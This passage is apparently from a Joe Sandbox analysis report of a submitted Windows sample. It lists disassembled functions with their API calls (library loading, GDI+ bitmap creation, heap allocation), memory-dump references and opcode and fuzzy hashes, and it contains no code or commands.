                                                            • Opcode Fuzzy Hash: 75ff076d4fda7ee08261ccd4ab150db1a87fa054f2eb33194e97a293e97fefc7
                                                            • Instruction Fuzzy Hash: 89E0D8B241034866DF02BB60DC06FDE3B6C5B15785F040856F344DB2B3EA78EA50A771
                                                            Function 00CD081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CD0836
                                                            • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CCF2D8,Crypt32.dll,00000000,00CCF35C,?,?,00CCF33E,?,?,?), ref: 00CD0858
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: DirectoryLibraryLoadSystem
                                                            • String ID:
                                                            • API String ID: 1175261203-0
                                                            • Opcode ID: 7897a06d350d108bb6f2e8b1b00c71931eca85e37ccdb51a83b7119170371284
                                                            • Instruction ID: 605f624d3a934571f306518ec5873533d3e08377ba50a9d1eb486a8d6e3741db
                                                            • Opcode Fuzzy Hash: 7897a06d350d108bb6f2e8b1b00c71931eca85e37ccdb51a83b7119170371284
                                                            • Instruction Fuzzy Hash: C0E012764001587ADF11A794DC09FDA7BACAF09391F040066B645D2144DA74DA84DAA0
                                                            Function 00CDA3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00CDA3DA
                                                            • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00CDA3E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: BitmapCreateFromGdipStream
                                                            • String ID:
                                                            • API String ID: 1918208029-0
                                                            • Opcode ID: 139324dc9d17a11b7794b7d3fd1ff622d6cc7eb9c301662065e23af0fa948a24
                                                            • Instruction ID: fa14efc77a776fa9127a3f7d45163464c1a3db1f40bd62315043f94595e2d662
                                                            • Opcode Fuzzy Hash: 139324dc9d17a11b7794b7d3fd1ff622d6cc7eb9c301662065e23af0fa948a24
                                                            • Instruction Fuzzy Hash: 00E0ED71500218EBCB50EF55C54179ABBE8EB04360F10805BAA9697351E374FF04DB91
                                                            Function 00CE2B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00CE2BAA
                                                            • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00CE2BB5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                            • String ID:
                                                            • API String ID: 1660781231-0
                                                            • Opcode ID: 81fa32f797c79bafe468c2c3a0bb0b4b4915483dfd9405221e5f6288c0907378
                                                            • Instruction ID: 379308dc263a6dd2451f81de652551865d73416027ee4bb639b9d8bf98a164ba
                                                            • Opcode Fuzzy Hash: 81fa32f797c79bafe468c2c3a0bb0b4b4915483dfd9405221e5f6288c0907378
                                                            • Instruction Fuzzy Hash: F2D022741643C02A4C243E733D0BF79338EAD51B787B00BAAF0328A4C1EE51A280B022
                                                            Function 00CC12F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: ItemShowWindow
                                                            • String ID:
                                                            • API String ID: 3351165006-0
                                                            • Opcode ID: a90a8644e0824b4665198f914123980f159018abcc1fd2378f48dd7525e6bba0
                                                            • Instruction ID: b268c6533427a23339467070f0941eccecf81cacc6b726044713af81d6a3c8a4
                                                            • Opcode Fuzzy Hash: a90a8644e0824b4665198f914123980f159018abcc1fd2378f48dd7525e6bba0
                                                            • Instruction Fuzzy Hash: 41C0123205C300BECB020BB4DC09C2BBBA8ABA5312F04C908B0A5C0260C23CC130DF21
                                                            Function 00CC1A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: d9eea51bc7e909ec721c07775a739f6df613db75998c0209918d32eb89e31d37
                                                            • Instruction ID: eb19185973fdd5c588a98da5b24f985494a3e7ba84f642030a8cf9d88e375000
                                                            • Opcode Fuzzy Hash: d9eea51bc7e909ec721c07775a739f6df613db75998c0209918d32eb89e31d37
                                                            • Instruction Fuzzy Hash: 1FC19170A00254ABEF15DF6AC494FA97BA5AF06310F0C01BDEC569B297DB309E44CB61
                                                            Function 00CC3BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 2bd0b9c051f504b9b1fec0362d7ed0bab7f8965e4798a06f1f1393cf558d0d76
                                                            • Instruction ID: 88922e7829fd0fd1d6647ba81d6f341057ff1616b0077a60a8725d10167e6b95
                                                            • Opcode Fuzzy Hash: 2bd0b9c051f504b9b1fec0362d7ed0bab7f8965e4798a06f1f1393cf558d0d76
                                                            • Instruction Fuzzy Hash: B571F471500B849EDB35EB74D855FEBB7E9AF14300F40492EE2AB87242DA327A84DF11
                                                            Function 00CC8284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00CC8289
                                                              • Part of subcall function 00CC13DC: __EH_prolog.LIBCMT ref: 00CC13E1
                                                              • Part of subcall function 00CCA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00CCA598
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: H_prolog$CloseFind
                                                            • String ID:
                                                            • API String ID: 2506663941-0
                                                            • Opcode ID: 210a3948beb0032047df8deb4c587b6854df31f3bffd0854eaa7d74a52d346a2
                                                            • Instruction ID: db93f7dc26b58680f72aefad0ff2a1943e6d8ef8eb65cef43edc1a6dc1b94f1c
                                                            • Opcode Fuzzy Hash: 210a3948beb0032047df8deb4c587b6854df31f3bffd0854eaa7d74a52d346a2
                                                            • Instruction Fuzzy Hash: 8641D6719446589ADB24EBA0CC55FEAB7B8AF00304F0804EFE59A97193EB705FC9DB10
                                                            Function 00CC13E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00CC13E1
                                                              • Part of subcall function 00CC5E37: __EH_prolog.LIBCMT ref: 00CC5E3C
                                                              • Part of subcall function 00CCCE40: __EH_prolog.LIBCMT ref: 00CCCE45
                                                              • Part of subcall function 00CCB505: __EH_prolog.LIBCMT ref: 00CCB50A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 7f95fa38065cb24d95740098f8bda9934368ae125d5814a097c1d6f6f98e737d
                                                            • Instruction ID: 20359fd918b34cc8f1ba067d66b3f68215b4e5623472c3c2e672620de31e77f4
                                                            • Opcode Fuzzy Hash: 7f95fa38065cb24d95740098f8bda9934368ae125d5814a097c1d6f6f98e737d
                                                            • Instruction Fuzzy Hash: F24156B0905B409EE724DF7AC885AE6FAE5BF19300F54492EE5FF83282CB316654DB10
                                                            Function 00CC13DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00CC13E1
                                                              • Part of subcall function 00CC5E37: __EH_prolog.LIBCMT ref: 00CC5E3C
                                                              • Part of subcall function 00CCCE40: __EH_prolog.LIBCMT ref: 00CCCE45
                                                              • Part of subcall function 00CCB505: __EH_prolog.LIBCMT ref: 00CCB50A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 67e73c95c534c8f75275de8ba4fa70ece157908bc1318c8caeb20d02f71685f7
                                                            • Instruction ID: ff2cb6316c78afa5243397c92b78ac1b1d71fce698e3cc7bb6e1349ed2df0e36
                                                            • Opcode Fuzzy Hash: 67e73c95c534c8f75275de8ba4fa70ece157908bc1318c8caeb20d02f71685f7
                                                            • Instruction Fuzzy Hash: 934136B0905B409AE724DF7A8885AE6FAE5BF19300F54492ED6FE83282CB316654DB11
                                                            Function 00CDB093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00CDB098
                                                              • Part of subcall function 00CC13DC: __EH_prolog.LIBCMT ref: 00CC13E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 987b6b81842e9588fe01848999f675fc482516375752babe8404d502e66e4777
                                                            • Instruction ID: 2ca2c5d52b57cf19085acfd6246cc057251f35ddba1e1eb703ce2348f369487b
                                                            • Opcode Fuzzy Hash: 987b6b81842e9588fe01848999f675fc482516375752babe8404d502e66e4777
                                                            • Instruction Fuzzy Hash: C8316A75810249EACF15EFA6C851AEEBBB4AF09304F14449EE809B7242D735AF04DB61
                                                            Function 00CEAC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00CEACF8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AddressProc
                                                            • String ID:
                                                            • API String ID: 190572456-0
                                                            • Opcode ID: 43af63536b91818c2b5aee8d3db4dc6179f403e96b6d50d976dd545e5078ed0e
                                                            • Instruction ID: 7824f002ddf0c2e71f09eec35e9ec191c81d99eda7c2d86d0247025a063c3941
                                                            • Opcode Fuzzy Hash: 43af63536b91818c2b5aee8d3db4dc6179f403e96b6d50d976dd545e5078ed0e
                                                            • Instruction Fuzzy Hash: 31110633A002756F9B269E2FEC40A6A7395AB847607264221FC25EB264D731FE01C7D3
                                                            Function 00CC9215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 8190cf6f987f89eb65332c54192a0b6134b399cf469749fc576fe9e0912a0cdb
                                                            • Instruction ID: 855139c5af4f0fa2fd384bcbe2168cb0eb52ea5583a86be99f968f6cd247530e
                                                            • Opcode Fuzzy Hash: 8190cf6f987f89eb65332c54192a0b6134b399cf469749fc576fe9e0912a0cdb
                                                            • Instruction Fuzzy Hash: FC01A533900568ABCF21BBA8CC85FDEB731EF88750F05412DE812B7262DA34CE01D6A0
                                                            Function 00CEC479 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CEB136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00CE9813,00000001,00000364,?,00CE3F73,00000050,?,00D01030,00000200), ref: 00CEB177
                                                            • _free.LIBCMT ref: 00CEC4E5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap_free
                                                            • String ID:
                                                            • API String ID: 614378929-0
                                                            • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                            • Instruction ID: b3a3472d510cc5782a0b131b34e99f2038b1e728b18163483431e197fba6df7c
                                                            • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                            • Instruction Fuzzy Hash: C801D6722003856BE3318F66988596AFBE9EB85370F25051DE594972C1EA30A906C764
                                                            Function 00CEB136 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00CE9813,00000001,00000364,?,00CE3F73,00000050,?,00D01030,00000200), ref: 00CEB177
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: d2708307c40d8d43721e13c7ebb7869896736efc95dbd48b4d9e56ad83377f64
                                                            • Instruction ID: ccc3e3d4dad10b8ecf855a7ff79b3b6d63994212939fd25b90ef046922017369
                                                            • Opcode Fuzzy Hash: d2708307c40d8d43721e13c7ebb7869896736efc95dbd48b4d9e56ad83377f64
                                                            • Instruction Fuzzy Hash: ADF089325051E577DB215B23AD15BBF7748AF41770B189221FC28D7194CB70DE0196E0
                                                            Function 00CE3C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00CE3C3F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AddressProc
                                                            • String ID:
                                                            • API String ID: 190572456-0
                                                            • Opcode ID: 4492134fe61d5968e261445a28b753d61389895d64bd539feadaa65d39c63994
                                                            • Instruction ID: 54bc5e34ec55069b1d0ad9591c5cd6fe9b2d83cceea6c986e8d265f5f70416a9
                                                            • Opcode Fuzzy Hash: 4492134fe61d5968e261445a28b753d61389895d64bd539feadaa65d39c63994
                                                            • Instruction Fuzzy Hash: 50F0EC322003D6AFCF114E6AEC08A9A7799EF05B617204225FA25E7190DB31FB20D7A0
                                                            Function 00CE8E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00CECA2C,00000000,?,00CE6CBE,?,00000008,?,00CE91E0,?,?,?), ref: 00CE8E38
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 35cdcb80a53a44cce55ae00700c8830a68443657887ef70157421ad1641a49d2
                                                            • Instruction ID: 7ada6ce07a8dbf83b07d9e6e4def2aa53132b651da481db04842e52c71dfdf8c
                                                            • Opcode Fuzzy Hash: 35cdcb80a53a44cce55ae00700c8830a68443657887ef70157421ad1641a49d2
                                                            • Instruction Fuzzy Hash: 86E06D3A2062E567EA7127679D05BAF76499B427B4F150121BC2C97191CF60CE0592E1
                                                            Function 00CC5ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00CC5AC2
                                                              • Part of subcall function 00CCB505: __EH_prolog.LIBCMT ref: 00CCB50A
